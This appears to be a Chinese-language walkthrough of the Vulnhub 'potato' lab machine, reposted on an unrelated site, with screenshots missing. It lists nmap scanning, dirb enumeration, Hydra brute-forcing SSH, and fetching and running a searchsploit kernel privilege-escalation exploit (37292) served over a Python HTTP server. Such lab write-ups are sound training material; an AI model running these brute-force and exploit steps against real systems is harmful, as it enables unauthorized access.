设为首页收藏本站
开启辅助访问

Vulnhub

 您所在的位置:网站首页 test下载potato Vulnhub

Vulnhub

2024-02-21 08:23| 来源: 网络整理| 查看: 265

目录 Vulnhub---potato信息收集扫描目标网段扫描端口访问网站扫描网站目录发现漏洞 ssh利用Hydra破解ssh登陆查看内核版本开启http服务

Vulnhub—potato

靶机下载地址:https://www.vulnhub.com/entry/potato-suncsr-1,556/

信息收集 扫描目标网段 nmap -sP 172.16.58.0/24

在这里插入图片描述

扫描端口 nmap -sS -sV -p- -v 172.16.58.130

在这里插入图片描述

访问网站

172.16.58.130 在这里插入图片描述

扫描网站目录 dirb http://172.16.58.130

在这里插入图片描述

发现漏洞

访问扫描出来的网址

http://192.168.232.188/info.php

在这里插入图片描述 这条路行不通,重新分析7120端口,利用ssh服务破解

ssh利用 Hydra破解ssh hydra -l potato -P top1000.txt -vV ssh://172.16.58.130:7120

在这里插入图片描述 在这里插入图片描述

登陆

使用破解出来的账号密码进行登录

ssh [email protected] -p 7120

在这里插入图片描述

查看内核版本 uname -a

在这里插入图片描述 另起一个终端

searchsploit ubuntu 3.13.0-24

在这里插入图片描述 进入到该目录下编译poc 在这里插入图片描述 编译完成后放在/var/www/html/目录下,进该目录查看一下。 在这里插入图片描述

开启http服务 python -m SimpleHTTPServer 8000

在这里插入图片描述 回到shell将编译好的文件下载到potato中 在这里插入图片描述 查看权限,赋予权限,执行文件,然后拿到权限

ls -l chmod +x 37292 ./37292

在这里插入图片描述



【本文地址】


今日新闻

推荐新闻

CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3